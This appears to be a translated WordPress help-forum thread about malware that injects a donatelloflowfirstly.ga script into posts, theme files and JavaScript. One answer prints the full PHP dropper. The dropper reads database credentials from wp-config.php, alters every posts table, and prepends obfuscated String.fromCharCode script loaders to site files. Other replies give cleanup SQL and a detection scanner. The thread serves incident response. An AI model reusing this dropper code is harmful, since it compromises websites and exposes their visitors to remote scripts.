Random JavaScript keeps getting added to every page of my WordPress site; how do I remove it?



Some malware got into my WordPress site; it inserts this kind of script into every post and page. How can I remove it without having to do it manually one by one?

They even inserted this script into robots.txt and into the description of every media item.

Chrome Inspect ... editor


<script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script>

First disable the plugins one by one to find out whether the culprit is a plugin. Then, if it doesn't go away, try changing the theme.

Alternatively, it might be easier to just download the whole folder and search the entire folder for the specific string with something like grep4win (in your case, js.donatelloflowfirst).

Check your public_html directory... maybe you will find a file named _a. This is injected malware that injects the code

<script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script>

into every post and every index.php file.

I had the same problem 10 hours ago and I have already cleaned my site.

Here is the content of the _a malware file:

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors',1);

search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","wp-config.php");
die();

function get_var_reg($pat,$text) {

if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}

return "";
}
function search_file_ms($dir,$file_to_search){
$search_array = array();
$files = scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_ms( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {

show_sitenames($path);



}
} else if($value != "." && $value != "..") {
@search_file_ms($path, $file_to_search);
}  
} 
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {


$db = get_var_reg("'DB_NAME'.*?,.*?['|"](.*?)['|"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|"](.*?)['|"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|"](.*?)['|"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|"](.*?)['|"]",$content);

// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {

} else { 

$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "js.donatelloflowfirstly.ga") === false){
if(strpos($val, "js.donatelloflowfirstly.ga") === false){


$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];

} else {

}
} 
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it($path);
} }else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}  
} 
}
function search_file_index($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

search_file_index( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it_index($path);
} }else if($value != "." && $value != "..") {
search_file_index($path, $file_to_search);
}  
} 
}
function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_js( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
make_it_js($path);
} }else if($value != "." && $value != "..") {
search_file_js($path, $file_to_search);
}  
} 
}
function make_it_js($f){
$g = file_get_contents($f);


if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {
} else {
$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."rn";
}

}
function make_it_index($f){
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false || strpos($g, 'js.donatelloflowfirstly.ga') !== false) {
} else {
$l2 = "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."rn";

}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {
} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}

}
}

As you can see, the code reads the DB login details and injects the script code into any index.php file, and likewise into the theme functions.

I did a search and replace in the database and cleaned this code out of all wp_posts tables, and I removed almost all plugins because it had infected every index.php file in the whole home directory.

It can also sit in header.php like this: https://gist.github.com/riper81/70e6fa8ac703d105490b6f5bb1708436
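Both forms of the injection seen in this thread (the plain `<script src='https://js.donatelloflowfirstly.ga/...'>` tag from the question, and the `String.fromCharCode(104,116,...)` obfuscated form from the _a dropper) can be found with one scanner. The following is an added example, not code from any of the answers; it decodes every fromCharCode call before matching, scans .txt as well so robots.txt is covered, and runs against a constructed sample tree:

```python
import re
import tempfile
from pathlib import Path

# Indicator taken from the posts above: the host of the injected stat.js script.
INDICATOR = "js.donatelloflowfirstly.ga"
# Plain form: <script src='https://js.donatello...'> as seen in wp_posts, header.php, index.php.
TAG_RE = re.compile(r"<script[^>]*src=['\"]https?://" + re.escape(INDICATOR), re.I)
# Obfuscated form from the _a file: the URL spelled out as String.fromCharCode(104,116,...).
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+)\)")
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".txt"}  # .txt so robots.txt is scanned

def decode_charcodes(text):
    """Replace every String.fromCharCode(...) call with the string it would build."""
    return CHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), text)

def classify(content):
    """Return the injection forms present in one file: 'tag', 'plain' and/or 'obfuscated'."""
    forms = []
    if TAG_RE.search(content):
        forms.append("tag")
    elif INDICATOR in content:          # bare host string, e.g. in robots.txt or media descriptions
        forms.append("plain")
    # Decode only the fromCharCode fragments, so a file is reported as obfuscated on its own merits.
    fragments = "".join(decode_charcodes(m.group(0)) for m in CHARCODE_RE.finditer(content))
    if INDICATOR in fragments:
        forms.append("obfuscated")
    return forms

def scan_tree(root):
    """Walk a WordPress install and map each infected file (relative path) to the forms found."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            forms = classify(path.read_text(errors="replace"))
            if forms:
                hits[path.relative_to(root).as_posix()] = forms
    return hits

def demo():
    """Constructed sample tree (not a real site): one clean file and three infected ones."""
    root = Path(tempfile.mkdtemp())
    theme = root / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (theme / "header.php").write_text("<script src='https://js.donatelloflowfirstly.ga/stat.js"
                                      "?n=nb5' type='text/javascript'></script>\n<html></html>\n")
    (theme / "main.js").write_text("elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,"
        "106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,"
        "121,46,103,97,47,115,116,97,116,46,106,115);\n")
    (root / "robots.txt").write_text("User-agent: *\n# js.donatelloflowfirstly.ga\n")
    return scan_tree(root)
```

Because the match is on the host rather than the full URL, the `?n=ns1` and `?n=nb5` variants from the thread are both caught; point `scan_tree()` at a downloaded copy of the site to get the list of files to clean.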

But just removing it now is pointless. First you need to understand how the hacker got into the server and fix the vulnerability. It may be a vulnerable version of the WordPress engine/plugins, theme (even an inactive one)/custom scripts/other sites on the same server.

I got infected with this malware, and they attack my site almost every night at 10 pm, even though I have cleaned up all the malware mentioned above. Just now I noticed something a bit off. I checked, and in the database of this hacked site there was a strange username with all privileges that I never added. Maybe they inject the malware through these privileged users. Now I have deleted these privileged users and we will see what happens next. Hopefully this solves the problem.

I have been hit by a second wave of this malware; it acts on Fridays. The first time, I cleaned all the scripts out of the database by searching for "donatello"; after finding the entries I ran this update against the database: UPDATE wp_posts SET post_content = (REPLACE(post_content, "<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>", ''));

Then it worked for only one week; last Friday it came back and I could not find those records, so it seems the way it operates has changed. I just found it in the first line of the theme's FUNCTIONS.PHP and HEADER.PHP files; I deleted those lines and it works again, but I still do not know the root of the problem.

Latest update